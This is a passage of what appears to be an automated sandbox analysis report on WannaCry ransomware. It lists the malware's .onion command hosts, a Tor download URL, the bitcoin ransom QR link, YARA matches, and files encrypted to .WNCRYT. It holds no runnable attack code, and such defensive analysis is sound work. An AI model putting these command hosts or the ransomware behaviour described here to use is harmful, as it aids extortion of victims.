                  Source: @WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmp, String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4451729871.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmp, String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: unknown, Network traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknown, Network traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknown, Network traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknown, TCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknown, TCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
                  Source: @WanaDecryptor@.exe String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365094465.0000000002791000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.4365358395.0000000002798000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zlib.net/D
                  Source: taskhsvc.exe, 0000001D.00000003.4413396862.0000000003710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://386bsd.net
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
                  Source: @WanaDecryptor@.exe String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip8B
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://trac.torproject.org/8742
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
                  Source: @WanaDecryptor@.exe String found in binary or memory: https://www.google.com/search?q=how
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.torproject.org/
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.torproject.org/documentation.html
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.torproject.org/download/download#warning
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_0040DB80 recv,25_2_0040DB80
                  Source: unknown HTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49840 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49865 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,25_2_004035A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_004035A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,37_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,37_2_004035A0

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: Yara match File source: Process Memory Space: @WanaDecryptor@.exe PID: 2380, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: @WanaDecryptor@.exe PID: 6116, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!25_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!28_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!37_2_004020A0
                  Source: Yara match File source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000025.00000000.4517258292.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 0000002B.00000000.4824076441.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000031.00000002.5430205338.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 0000002B.00000002.4826014991.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 0000002E.00000002.5128621627.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000002E.00000000.5126549590.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: 00000034.00000000.5730513383.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: WannaCrypt0r.sk PID: 1300, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\Desktop\u.wnry, type: DROPPED
                  Source: Yara match File source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara match File source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File moved: C:\Users\user\Desktop\ZQIXMVQGAH\PIVFAGEAAV.jpg
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File moved: C:\Users\user\Desktop\PIVFAGEAAV.jpg
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File moved: C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File moved: C:\Users\user\Desktop\PWCCAWLGRE.mp3
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File moved: C:\Users\user\Desktop\GAOBCVIQIJ\NVWZAPQSQL.jpg
                  Source: C:\Windows\System32\certutil.exe File created: C:\Users\user\Desktop\WannaCrypt0r.sk entropy: 7.99547094116
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99365463856
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99983740974
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99517561232
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99310446081
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99160372259
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT entropy: 7.99160943209
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99981239664
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99996235843
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991993003
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99994401127
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.997282021
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99981494718
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99982801931
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99982346579
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99979235793
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995535799
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99363403058
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99978935975
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT entropy: 7.99089203949
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT entropy: 7.99217536389
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT entropy: 7.99983002527
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT entropy: 7.99534123292
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT entropy: 7.99886185801
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99327545755
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT entropy: 7.99672373611
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT entropy: 7.99714354794
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.9998792411
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99442180692
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99991986864
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129748497427.txt.WNCRYT entropy: 7.99823243673
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99557312895
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99926686707
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99923230102
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99956986741
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT entropy: 7.99729961872
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT entropy: 7.99748953277
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99715485367
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99965231247
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99959558772
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99760714543
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT entropy: 7.99596155504
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT entropy: 7.99850121057
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991814511
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99794152673
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99920736098
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT entropy: 7.99100127536
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99540089165
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99420579714
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.99994305953
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\Desktop\WannaCry.cmd.WNCRYT entropy: 7.99996970245
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\Desktop\WannaCry.cmd entropy: 7.99926954449
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT entropy: 7.99934672494
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT entropy: 7.99775079875
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.99921662155
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130048509273.txt.WNCRYT entropy: 7.99839584406
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.99942255604
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130348618804.txt.WNCRYT entropy: 7.99827750608
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.99929003447
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.99310922542
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99886987358Jump to dropped file
